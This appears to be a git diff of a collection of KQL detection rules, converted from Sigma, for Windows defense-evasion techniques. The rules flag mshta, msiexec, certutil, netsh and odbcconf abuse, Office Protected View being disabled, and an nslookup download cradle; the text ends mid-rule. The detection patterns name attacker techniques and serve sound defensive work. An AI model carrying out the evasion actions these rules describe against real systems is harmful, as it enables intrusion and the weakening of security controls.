Evasion/microsoft_office_protected_view_disabled.kql index 1d5faa31..88fbf6f7 100644 --- a/KQL/rules/Defense Evasion/microsoft_office_protected_view_disabled.kql +++ b/KQL/rules/Defense Evasion/microsoft_office_protected_view_disabled.kql @@ -1,12 +1,12 @@ -// Title: Microsoft Office Protected View Disabled -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2021-06-08 -// Level: high -// Description: Detects changes to Microsoft Office protected view registry keys with which the attacker disables this feature. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Unlikely - -DeviceRegistryEvents +// Title: Microsoft Office Protected View Disabled +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-06-08 +// Level: high +// Description: Detects changes to Microsoft Office protected view registry keys with which the attacker disables this feature. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Unlikely + +DeviceRegistryEvents | where (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Office*" and RegistryKey endswith "\\Security\\ProtectedView*") and ((RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\enabledatabasefileprotectedview" or RegistryKey endswith "\\enableforeigntextfileprotectedview")) or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "\\DisableAttachementsInPV" or RegistryKey endswith "\\DisableInternetFilesInPV" or RegistryKey endswith "\\DisableIntranetCheck" or RegistryKey endswith "\\DisableUnsafeLocationsInPV"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/modify_group_policy_settings.kql b/KQL/rules/Defense Evasion/modify_group_policy_settings.kql index db6d28de..98ca15ba 100644 --- a/KQL/rules/Defense Evasion/modify_group_policy_settings.kql +++ b/KQL/rules/Defense Evasion/modify_group_policy_settings.kql @@ -1,12 +1,12 @@ -// Title: Modify Group Policy Settings -// Author: frack113 -// Date: 2022-08-19 -// Level: medium -// Description: Detect malicious GPO modifications can be used to implement many other malicious behaviors. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1484.001 -// False Positives: -// - Legitimate use - -DeviceProcessEvents +// Title: Modify Group Policy Settings +// Author: frack113 +// Date: 2022-08-19 +// Level: medium +// Description: Detect malicious GPO modifications can be used to implement many other malicious behaviors. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1484.001 +// False Positives: +// - Legitimate use + +DeviceProcessEvents | where (ProcessCommandLine contains "GroupPolicyRefreshTimeDC" or ProcessCommandLine contains "GroupPolicyRefreshTimeOffsetDC" or ProcessCommandLine contains "GroupPolicyRefreshTime" or ProcessCommandLine contains "GroupPolicyRefreshTimeOffset" or ProcessCommandLine contains "EnableSmartScreen" or ProcessCommandLine contains "ShellSmartScreenLevel") and ProcessCommandLine contains "\\SOFTWARE\\Policies\\Microsoft\\Windows\\System" and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/msdt_execution_via_answer_file.kql b/KQL/rules/Defense Evasion/msdt_execution_via_answer_file.kql index b0e242ea..7110ffa0 100644 --- a/KQL/rules/Defense Evasion/msdt_execution_via_answer_file.kql +++ b/KQL/rules/Defense Evasion/msdt_execution_via_answer_file.kql @@ -1,12 +1,12 @@ -// Title: MSDT Execution Via Answer File -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-06-13 -// Level: high -// Description: Detects execution of "msdt.exe" using an answer file which is simulating the legitimate way of calling msdt via "pcwrun.exe" (For example from the compatibility tab). -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218, attack.execution -// False Positives: -// - Possible undocumented parents of "msdt" other than "pcwrun". - -DeviceProcessEvents +// Title: MSDT Execution Via Answer File +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-13 +// Level: high +// Description: Detects execution of "msdt.exe" using an answer file which is simulating the legitimate way of calling msdt via "pcwrun.exe" (For example from the compatibility tab). +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, attack.execution +// False Positives: +// - Possible undocumented parents of "msdt" other than "pcwrun". + +DeviceProcessEvents | where (ProcessCommandLine contains "\\WINDOWS\\diagnostics\\index\\PCWDiagnostic.xml" and (ProcessCommandLine contains " -af " or ProcessCommandLine contains " /af " or ProcessCommandLine contains " –af " or ProcessCommandLine contains " —af " or ProcessCommandLine contains " ―af ") and FolderPath endswith "\\msdt.exe") and (not(InitiatingProcessFolderPath endswith "\\pcwrun.exe")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/mshta_execution_with_suspicious_file_extensions.kql b/KQL/rules/Defense Evasion/mshta_execution_with_suspicious_file_extensions.kql index a312f3c6..1241c065 100644 --- a/KQL/rules/Defense Evasion/mshta_execution_with_suspicious_file_extensions.kql +++ b/KQL/rules/Defense Evasion/mshta_execution_with_suspicious_file_extensions.kql @@ -1,15 +1,15 @@ -// Title: MSHTA Execution with Suspicious File Extensions -// Author: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule), Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2019-02-22 -// Level: high -// Description: Detects execution of mshta.exe with file types that looks like they do not typically represent HTA (HTML Application) content, -// such as .png, .jpg, .zip, .pdf, and others, which are often polyglots. MSHTA is a legitimate Windows utility for executing HTML Applications -// containing VBScript or JScript. Threat actors often abuse this lolbin utility to download and -// execute malicious scripts disguised as benign files or hosted under misleading extensions to evade detection. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1140, attack.t1218.005, attack.execution, attack.t1059.007, cve.2020-1599 -// False Positives: -// - False positives depend on scripts and administrative tools used in the monitored environment - -DeviceProcessEvents +// Title: MSHTA Execution with Suspicious File Extensions +// Author: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule), Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2019-02-22 +// Level: high +// Description: Detects execution of mshta.exe with file types that looks like they do not typically represent HTA (HTML Application) content, +// such as .png, .jpg, .zip, .pdf, and others, which are often polyglots. MSHTA is a legitimate Windows utility for executing HTML Applications +// containing VBScript or JScript. Threat actors often abuse this lolbin utility to download and +// execute malicious scripts disguised as benign files or hosted under misleading extensions to evade detection. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1140, attack.t1218.005, attack.execution, attack.t1059.007, cve.2020-1599 +// False Positives: +// - False positives depend on scripts and administrative tools used in the monitored environment + +DeviceProcessEvents | where (ProcessCommandLine contains ".7z" or ProcessCommandLine contains ".avi" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".bmp" or ProcessCommandLine contains ".conf" or ProcessCommandLine contains ".csv" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".doc" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".gz" or ProcessCommandLine contains ".ini" or ProcessCommandLine contains ".jpe" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".json" or ProcessCommandLine contains ".lnk" or ProcessCommandLine contains ".log" or ProcessCommandLine contains ".mkv" or ProcessCommandLine contains ".mp3" or ProcessCommandLine contains ".mp4" or ProcessCommandLine contains ".pdf" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".ppt" or ProcessCommandLine contains ".rar" or ProcessCommandLine contains ".rtf" or ProcessCommandLine contains ".svg" or ProcessCommandLine contains ".tar" or ProcessCommandLine contains ".tmp" or ProcessCommandLine contains ".txt" or ProcessCommandLine contains ".xls" or ProcessCommandLine contains ".xml" or ProcessCommandLine contains ".yaml" or ProcessCommandLine contains ".yml" or ProcessCommandLine contains ".zip" or ProcessCommandLine contains "vbscript") and (FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "mshta.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/mshtml_dll_runhtmlapplication_suspicious_usage.kql b/KQL/rules/Defense Evasion/mshtml_dll_runhtmlapplication_suspicious_usage.kql index 844173d9..ad203736 100644 --- a/KQL/rules/Defense Evasion/mshtml_dll_runhtmlapplication_suspicious_usage.kql +++ b/KQL/rules/Defense Evasion/mshtml_dll_runhtmlapplication_suspicious_usage.kql @@ -1,12 +1,12 @@ -// Title: Mshtml.DLL RunHTMLApplication Suspicious Usage -// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems), Josh Nickels, frack113, Zaw Min Htun (ZETA) -// Date: 2022-08-14 -// Level: high -// Description: Detects execution of commands that leverage the "mshtml.dll" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, http...) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Mshtml.DLL RunHTMLApplication Suspicious Usage +// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems), Josh Nickels, frack113, Zaw Min Htun (ZETA) +// Date: 2022-08-14 +// Level: high +// Description: Detects execution of commands that leverage the "mshtml.dll" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, http...) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains "#135" or ProcessCommandLine contains "RunHTMLApplication") and (ProcessCommandLine contains "\\..\\" and ProcessCommandLine contains "mshtml") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/msiexec_quiet_installation.kql b/KQL/rules/Defense Evasion/msiexec_quiet_installation.kql index 085455fe..d78d366c 100644 --- a/KQL/rules/Defense Evasion/msiexec_quiet_installation.kql +++ b/KQL/rules/Defense Evasion/msiexec_quiet_installation.kql @@ -1,13 +1,13 @@ -// Title: Msiexec Quiet Installation -// Author: frack113 -// Date: 2022-01-16 -// Level: medium -// Description: Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. -// Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.007 -// False Positives: -// - WindowsApps installing updates via the quiet flag - -DeviceProcessEvents +// Title: Msiexec Quiet Installation +// Author: frack113 +// Date: 2022-01-16 +// Level: medium +// Description: Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. +// Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.007 +// False Positives: +// - WindowsApps installing updates via the quiet flag + +DeviceProcessEvents | where ((ProcessCommandLine contains "-i" or ProcessCommandLine contains "/i" or ProcessCommandLine contains "–i" or ProcessCommandLine contains "—i" or ProcessCommandLine contains "―i" or ProcessCommandLine contains "-package" or ProcessCommandLine contains "/package" or ProcessCommandLine contains "–package" or ProcessCommandLine contains "—package" or ProcessCommandLine contains "―package" or ProcessCommandLine contains "-a" or ProcessCommandLine contains "/a" or ProcessCommandLine contains "–a" or ProcessCommandLine contains "—a" or ProcessCommandLine contains "―a" or ProcessCommandLine contains "-j" or ProcessCommandLine contains "/j" or ProcessCommandLine contains "–j" or ProcessCommandLine contains "—j" or ProcessCommandLine contains "―j") and (FolderPath endswith "\\msiexec.exe" or ProcessVersionInfoOriginalFileName =~ "msiexec.exe") and (ProcessCommandLine contains "-q" or ProcessCommandLine contains "/q" or ProcessCommandLine contains "–q" or ProcessCommandLine contains "—q" or ProcessCommandLine contains "―q")) and (not((((ProcessIntegrityLevel in~ ("System", "S-1-16-16384")) and InitiatingProcessFolderPath =~ "C:\\Windows\\CCM\\Ccm32BitLauncher.exe") or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\" or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" and InitiatingProcessFolderPath startswith "C:\\Users\\")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/msiexec_web_install.kql b/KQL/rules/Defense Evasion/msiexec_web_install.kql index fc056a5b..abc7506a 100644 --- a/KQL/rules/Defense Evasion/msiexec_web_install.kql +++ b/KQL/rules/Defense Evasion/msiexec_web_install.kql @@ -1,12 +1,12 @@ -// Title: MsiExec Web Install -// Author: Florian Roth (Nextron Systems) -// Date: 2018-02-09 -// Level: medium -// Description: Detects suspicious msiexec process starts with web addresses as parameter -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.007, attack.command-and-control, attack.t1105 -// False Positives: -// - False positives depend on scripts and administrative tools used in the monitored environment - -DeviceProcessEvents +// Title: MsiExec Web Install +// Author: Florian Roth (Nextron Systems) +// Date: 2018-02-09 +// Level: medium +// Description: Detects suspicious msiexec process starts with web addresses as parameter +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.007, attack.command-and-control, attack.t1105 +// False Positives: +// - False positives depend on scripts and administrative tools used in the monitored environment + +DeviceProcessEvents | where ProcessCommandLine contains " msiexec" and ProcessCommandLine contains "://" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/msxsl_exe_execution.kql b/KQL/rules/Defense Evasion/msxsl_exe_execution.kql index 2801184e..fdb921c9 100644 --- a/KQL/rules/Defense Evasion/msxsl_exe_execution.kql +++ b/KQL/rules/Defense Evasion/msxsl_exe_execution.kql @@ -1,13 +1,13 @@ -// Title: Msxsl.EXE Execution -// Author: Timur Zinniatullin, oscd.community -// Date: 2019-10-21 -// Level: medium -// Description: Detects the execution of the MSXSL utility. This can be used to execute Extensible Stylesheet Language (XSL) files. These files are commonly used to describe the processing and rendering of data within XML files. -// Adversaries can abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1220 -// False Positives: -// - Msxsl is not installed by default and is deprecated, so unlikely on most systems. - -DeviceProcessEvents +// Title: Msxsl.EXE Execution +// Author: Timur Zinniatullin, oscd.community +// Date: 2019-10-21 +// Level: medium +// Description: Detects the execution of the MSXSL utility. This can be used to execute Extensible Stylesheet Language (XSL) files. These files are commonly used to describe the processing and rendering of data within XML files. +// Adversaries can abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1220 +// False Positives: +// - Msxsl is not installed by default and is deprecated, so unlikely on most systems. + +DeviceProcessEvents | where FolderPath endswith "\\msxsl.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/netsh_allow_group_policy_on_microsoft_defender_firewall.kql b/KQL/rules/Defense Evasion/netsh_allow_group_policy_on_microsoft_defender_firewall.kql index f069d3ac..bb50efd1 100644 --- a/KQL/rules/Defense Evasion/netsh_allow_group_policy_on_microsoft_defender_firewall.kql +++ b/KQL/rules/Defense Evasion/netsh_allow_group_policy_on_microsoft_defender_firewall.kql @@ -1,12 +1,12 @@ -// Title: Netsh Allow Group Policy on Microsoft Defender Firewall -// Author: frack113 -// Date: 2022-01-09 -// Level: medium -// Description: Adversaries may modify system firewalls in order to bypass controls limiting network usage -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.004 -// False Positives: -// - Legitimate administration activity - -DeviceProcessEvents +// Title: Netsh Allow Group Policy on Microsoft Defender Firewall +// Author: frack113 +// Date: 2022-01-09 +// Level: medium +// Description: Adversaries may modify system firewalls in order to bypass controls limiting network usage +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.004 +// False Positives: +// - Legitimate administration activity + +DeviceProcessEvents | where (ProcessCommandLine contains "advfirewall" and ProcessCommandLine contains "firewall" and ProcessCommandLine contains "set" and ProcessCommandLine contains "rule" and ProcessCommandLine contains "group=" and ProcessCommandLine contains "new" and ProcessCommandLine contains "enable=Yes") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/network_connection_initiated_by_addinutil_exe.kql b/KQL/rules/Defense Evasion/network_connection_initiated_by_addinutil_exe.kql index c966b8b5..3b1ea25d 100644 --- a/KQL/rules/Defense Evasion/network_connection_initiated_by_addinutil_exe.kql +++ b/KQL/rules/Defense Evasion/network_connection_initiated_by_addinutil_exe.kql @@ -1,11 +1,11 @@ -// Title: Network Connection Initiated By AddinUtil.EXE -// Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri) -// Date: 2023-09-18 -// Level: high -// Description: Detects a network connection initiated by the Add-In deployment cache updating utility "AddInutil.exe". -// This could indicate a potential command and control communication as this tool doesn't usually initiate network activity. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 - -DeviceNetworkEvents +// Title: Network Connection Initiated By AddinUtil.EXE +// Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri) +// Date: 2023-09-18 +// Level: high +// Description: Detects a network connection initiated by the Add-In deployment cache updating utility "AddInutil.exe". +// This could indicate a potential command and control communication as this tool doesn't usually initiate network activity. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceNetworkEvents | where InitiatingProcessFolderPath endswith "\\addinutil.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/new_capture_session_launched_via_dxcap_exe.kql b/KQL/rules/Defense Evasion/new_capture_session_launched_via_dxcap_exe.kql index efa434e8..c5279971 100644 --- a/KQL/rules/Defense Evasion/new_capture_session_launched_via_dxcap_exe.kql +++ b/KQL/rules/Defense Evasion/new_capture_session_launched_via_dxcap_exe.kql @@ -1,12 +1,12 @@ -// Title: New Capture Session Launched Via DXCap.EXE -// Author: Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems) -// Date: 2019-10-26 -// Level: medium -// Description: Detects the execution of "DXCap.EXE" with the "-c" flag, which allows a user to launch any arbitrary binary or windows package through DXCap itself. This can be abused to potentially bypass application whitelisting. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 -// False Positives: -// - Legitimate execution of dxcap.exe by legitimate user - -DeviceProcessEvents +// Title: New Capture Session Launched Via DXCap.EXE +// Author: Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-10-26 +// Level: medium +// Description: Detects the execution of "DXCap.EXE" with the "-c" flag, which allows a user to launch any arbitrary binary or windows package through DXCap itself. This can be abused to potentially bypass application whitelisting. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate execution of dxcap.exe by legitimate user + +DeviceProcessEvents | where ProcessCommandLine contains " -c " and (FolderPath endswith "\\DXCap.exe" or ProcessVersionInfoOriginalFileName =~ "DXCap.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/new_dll_registered_via_odbcconf_exe.kql b/KQL/rules/Defense Evasion/new_dll_registered_via_odbcconf_exe.kql index ace0035c..484f57b8 100644 --- a/KQL/rules/Defense Evasion/new_dll_registered_via_odbcconf_exe.kql +++ b/KQL/rules/Defense Evasion/new_dll_registered_via_odbcconf_exe.kql @@ -1,12 +1,12 @@ -// Title: New DLL Registered Via Odbcconf.EXE -// Author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-22 -// Level: medium -// Description: Detects execution of "odbcconf" with "REGSVR" in order to register a new DLL (equivalent to running regsvr32). Attackers abuse this to install and run malicious DLLs. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.008 -// False Positives: -// - Legitimate DLLs being registered via "odbcconf" will generate false positives. Investigate the path of the DLL and its content to determine if the action is authorized. - -DeviceProcessEvents +// Title: New DLL Registered Via Odbcconf.EXE +// Author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-22 +// Level: medium +// Description: Detects execution of "odbcconf" with "REGSVR" in order to register a new DLL (equivalent to running regsvr32). Attackers abuse this to install and run malicious DLLs. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.008 +// False Positives: +// - Legitimate DLLs being registered via "odbcconf" will generate false positives. Investigate the path of the DLL and its content to determine if the action is authorized. + +DeviceProcessEvents | where (ProcessCommandLine contains "REGSVR " and ProcessCommandLine contains ".dll") and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/new_file_association_using_exefile.kql b/KQL/rules/Defense Evasion/new_file_association_using_exefile.kql index 7c94cc0e..db6a3359 100644 --- a/KQL/rules/Defense Evasion/new_file_association_using_exefile.kql +++ b/KQL/rules/Defense Evasion/new_file_association_using_exefile.kql @@ -1,10 +1,10 @@ -// Title: New File Association Using Exefile -// Author: Andreas Hunkeler (@Karneades) -// Date: 2021-11-19 -// Level: high -// Description: Detects the abuse of the exefile handler in new file association. Used for bypass of security products. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion - -DeviceRegistryEvents +// Title: New File Association Using Exefile +// Author: Andreas Hunkeler (@Karneades) +// Date: 2021-11-19 +// Level: high +// Description: Detects the abuse of the exefile handler in new file association. Used for bypass of security products. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceRegistryEvents | where RegistryValueData =~ "exefile" and RegistryKey contains "Classes\\." \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/new_firewall_rule_added_via_netsh_exe.kql b/KQL/rules/Defense Evasion/new_firewall_rule_added_via_netsh_exe.kql index fcb58fe6..1209e1c5 100644 --- a/KQL/rules/Defense Evasion/new_firewall_rule_added_via_netsh_exe.kql +++ b/KQL/rules/Defense Evasion/new_firewall_rule_added_via_netsh_exe.kql @@ -1,13 +1,13 @@ -// Title: New Firewall Rule Added Via Netsh.EXE -// Author: Markus Neis, Sander Wiebing -// Date: 2019-01-29 -// Level: medium -// Description: Detects the addition of a new rule to the Windows firewall via netsh -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.004, attack.s0246 -// False Positives: -// - Legitimate administration activity -// - Software installations - -DeviceProcessEvents +// Title: New Firewall Rule Added Via Netsh.EXE +// Author: Markus Neis, Sander Wiebing +// Date: 2019-01-29 +// Level: medium +// Description: Detects the addition of a new rule to the Windows firewall via netsh +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.004, attack.s0246 +// False Positives: +// - Legitimate administration activity +// - Software installations + +DeviceProcessEvents | where ((ProcessCommandLine contains " firewall " and ProcessCommandLine contains " add ") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")) and (not(((ProcessCommandLine contains "advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=" and ProcessCommandLine contains ":\\Program Files (x86)\\Dropbox\\Client\\Dropbox.exe\" enable=yes profile=Any") or (ProcessCommandLine contains "advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=" and ProcessCommandLine contains ":\\Program Files\\Dropbox\\Client\\Dropbox.exe\" enable=yes profile=Any")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/new_process_created_via_taskmgr_exe.kql b/KQL/rules/Defense Evasion/new_process_created_via_taskmgr_exe.kql index 815bca1a..20e8ce7a 100644 --- a/KQL/rules/Defense Evasion/new_process_created_via_taskmgr_exe.kql +++ b/KQL/rules/Defense Evasion/new_process_created_via_taskmgr_exe.kql @@ -1,12 +1,12 @@ -// Title: New Process Created Via Taskmgr.EXE -// Author: Florian Roth (Nextron Systems) -// Date: 2018-03-13 -// Level: low -// Description: Detects the creation of a process via the Windows task manager. This might be an attempt to bypass UAC -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036 -// False Positives: -// - Administrative activity - -DeviceProcessEvents +// Title: New Process Created Via Taskmgr.EXE +// Author: Florian Roth (Nextron Systems) +// Date: 2018-03-13 +// Level: low +// Description: Detects the creation of a process via the Windows task manager. This might be an attempt to bypass UAC +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036 +// False Positives: +// - Administrative activity + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\taskmgr.exe" and (not((FolderPath endswith ":\\Windows\\System32\\mmc.exe" or FolderPath endswith ":\\Windows\\System32\\resmon.exe" or FolderPath endswith ":\\Windows\\System32\\Taskmgr.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/new_root_certificate_installed_via_certmgr_exe.kql b/KQL/rules/Defense Evasion/new_root_certificate_installed_via_certmgr_exe.kql index 491c2009..5a001200 100644 --- a/KQL/rules/Defense Evasion/new_root_certificate_installed_via_certmgr_exe.kql +++ b/KQL/rules/Defense Evasion/new_root_certificate_installed_via_certmgr_exe.kql @@ -1,13 +1,13 @@ -// Title: New Root Certificate Installed Via CertMgr.EXE -// Author: oscd.community, @redcanary, Zach Stanford @svch0st -// Date: 2023-03-05 -// Level: medium -// Description: Detects execution of "certmgr" with the "add" flag in order to install a new certificate on the system. -// Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1553.004 -// False Positives: -// - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP - -DeviceProcessEvents +// Title: New Root Certificate Installed Via CertMgr.EXE +// Author: oscd.community, @redcanary, Zach Stanford @svch0st +// Date: 2023-03-05 +// Level: medium +// Description: Detects execution of "certmgr" with the "add" flag in order to install a new certificate on the system. +// Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1553.004 +// False Positives: +// - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP + +DeviceProcessEvents | where (ProcessCommandLine contains "/add" and ProcessCommandLine contains "root") and (FolderPath endswith "\\CertMgr.exe" or ProcessVersionInfoOriginalFileName =~ "CERTMGT.EXE") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/new_root_certificate_installed_via_certutil_exe.kql b/KQL/rules/Defense Evasion/new_root_certificate_installed_via_certutil_exe.kql index 35c79c9c..4835d8e4 100644 --- a/KQL/rules/Defense Evasion/new_root_certificate_installed_via_certutil_exe.kql +++ b/KQL/rules/Defense Evasion/new_root_certificate_installed_via_certutil_exe.kql @@ -1,13 +1,13 @@ -// Title: New Root Certificate Installed Via Certutil.EXE -// Author: oscd.community, @redcanary, Zach Stanford @svch0st -// Date: 2023-03-05 -// Level: medium -// Description: Detects execution of "certutil" with the "addstore" flag in order to install a new certificate on the system. -// Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1553.004 -// False Positives: -// - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP - -DeviceProcessEvents +// Title: New Root Certificate Installed Via Certutil.EXE +// Author: oscd.community, @redcanary, Zach Stanford @svch0st +// Date: 2023-03-05 +// Level: medium +// Description: Detects execution of "certutil" with the "addstore" flag in order to install a new certificate on the system. +// Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1553.004 +// False Positives: +// - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP + +DeviceProcessEvents | where (ProcessCommandLine contains "-addstore" or ProcessCommandLine contains "/addstore" or ProcessCommandLine contains "–addstore" or ProcessCommandLine contains "—addstore" or ProcessCommandLine contains "―addstore") and ProcessCommandLine contains "root" and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/node_process_executions.kql b/KQL/rules/Defense Evasion/node_process_executions.kql index a87cef39..0d7faa39 100644 --- a/KQL/rules/Defense Evasion/node_process_executions.kql +++ b/KQL/rules/Defense Evasion/node_process_executions.kql @@ -1,10 +1,10 @@ -// Title: Node Process Executions -// Author: Max Altgelt (Nextron Systems) -// Date: 2022-04-06 -// Level: medium -// Description: Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.t1127, attack.t1059.007 - -DeviceProcessEvents +// Title: Node Process Executions +// Author: Max Altgelt (Nextron Systems) +// Date: 2022-04-06 +// Level: medium +// Description: Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1127, attack.t1059.007 + +DeviceProcessEvents | where FolderPath endswith "\\Adobe Creative Cloud Experience\\libs\\node.exe" and (not(ProcessCommandLine contains "Adobe Creative Cloud Experience\\js")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/nslookup_powershell_download_cradle_processcreation.kql b/KQL/rules/Defense Evasion/nslookup_powershell_download_cradle_processcreation.kql index 801ff407..dfd8fdbb 100644 --- a/KQL/rules/Defense Evasion/nslookup_powershell_download_cradle_processcreation.kql +++ b/KQL/rules/Defense Evasion/nslookup_powershell_download_cradle_processcreation.kql @@ -1,10 +1,10 @@ -// Title: Nslookup PowerShell Download Cradle - ProcessCreation -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-09-05 -// Level: medium -// Description: Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion - -DeviceProcessEvents +// Title: Nslookup PowerShell Download Cradle - ProcessCreation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 